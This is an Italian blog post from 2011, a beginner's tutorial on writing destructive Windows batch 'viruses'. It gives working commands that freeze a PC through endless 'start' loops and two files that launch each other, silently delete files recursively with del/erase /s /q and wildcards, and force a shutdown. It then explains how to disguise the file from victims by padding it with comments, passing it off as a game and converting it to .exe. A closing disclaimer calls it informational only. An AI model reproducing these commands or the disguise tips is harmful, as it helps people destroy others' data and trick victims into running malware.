domenica 3 luglio 2011

Creare virus in batch

Ciao a tutti, oggi con il mio primo articolo desidero spiegare ai meno esperti di voi, come creare un "innoquo" virus in batch.

Allora iniziamo...

Il procedimento per creare un file batch è semplice:
- Create un documento di testo con il Blocco note
- Scriveteci il codice del vostro virus
- Fate "Salva con nome"  ----> <Nome che volete>.bat

A questo punto l'immagine del file dovrebbe essere un ingranaggio.

Impallare il pc 

Per impallare un pc aprite il file e scrivete:
start
start
start
start
start
start
...

Fatelo più volte possibile, ogni "start" aprirà una shell, quindi se volete che il pc sia impossibile da sbloccare vi consiglio di scriverlo almeno 50.000 volte, ovviamente con il copia e incolla :D. 
Un altro metodo che ho trovato consiste nel utilizzare due file che si aprono a vicenda all'infinito, e basterà scrivere start una sola volta.

Codice 1° file (1.bat):
start 2.bat
 
Codice 2° file (2.bat):
start 1.bat

Facile no? Ovviamente il nome del file deve corrispondere con il codice, ed entrambi i file devono risiedere nella stessa cartella.


Cancellare un file

Passiamo ora ad un comando più distruttivo, ovvero quello per cancellare un file:

@erase  /s /q "C:\...\...\*.*"
@del /s /q "C:\...\...\*.*"

I due comandi fanno esattamente la stessa cosa, ma analizziamoli meglio...

la "@" non visualizza il percorso del file, ossia non dice in quale cartella è presente quest'ultimo
ERASE e DEL sono i comandi che cancellano i file, mentre quelli
seguiti da "/" sono gli attributi dei comandi... Ecco un'elenco degli attributi
di questi due comandi

 /p Chiede conferma prima di eliminare ogni file.
 /f Forza l'eliminazione dei file di sola lettura.
 /s Elimina i file specificati da tutte le sottodirectory.
 /q Modalità silenziosa, non chiede conferma per eliminazioni globali.
 /a Seleziona i file da eliminare in base agli attributi.

Cosa significa il *.*?
Il primo asterisco indica che i file possono avere qualsiasi nome, mentre il secondo indica che possono avere qualsiasi formato. Se voglio cancellare tutti i file in formato txt mi basterà scrivere:

@del /s /q "C:\...\...\*.txt" 

Mi raccomando, ricordatevi le " " prima e dopo il percorso o windows non ve lo riconoscerà.

Spegnere il computer 

Il comando per spegnere il pc è shutdown, non sembra cosi pericoloso ma in certe circostanze potrebbe rivelarsi abbastanza bastardo.

shutdown  -f -t ..... -r

Il comando <-t .....> inIdica dopo quanto tempo il computer deve spegnersi. Questi sono i significati degli attributi: 

-i : attiva l’interfaccia utente grafica
-l :
effettua il logoff dell’utente.
-r :
riavvia il sistema
-s :
chiude la sessione di Windows (spegne il computer)
-t :
.... indica i secondi di attesa prima della chiusura di Windows
-f :
chiude le applicazioni ancora aperte
 

Appesantire i vostri virus

Appesantire il vostro virus è molto importante, chiunque con un po' di esperienza informatica si insospettirebbe nel vedere un file da 2kb... Il virus potrebbe essere somministrato sotto forma di un gioco, o qualcosa di simile. Per aumentare le dimensioni del vostro virus il comando è questo:

@rem ............................................................................................................

La scritta rem consiste nel creare commenti, e non influisce in nessun modo nel funzionamento del programma, per questo possiamo utilizzarlo per appesantire un file. Al posto dei ... dovete scrivere tante parole, non importa cosa, l'importante è che con copia e incolla lo copiate tante volte in modo da appesantire notevolmente il file.

Convertire da .bat in .exe  

Un file .bat, qualunque siano le dimensioni può sempre destare sospetto, per questo potrebbe essere utile convertirlo in .exe dato che la maggior parte degli eseguibili del programmi sono in questo formato. 
Un programma per la conversione è questo.  


Ho scritto questo articolo a solo scopo informativo, pertanto non mi ritengo responsabile delle vostre azioni.

FINE, spero di esservi stato utile. 



Nessun commento:

Posta un commento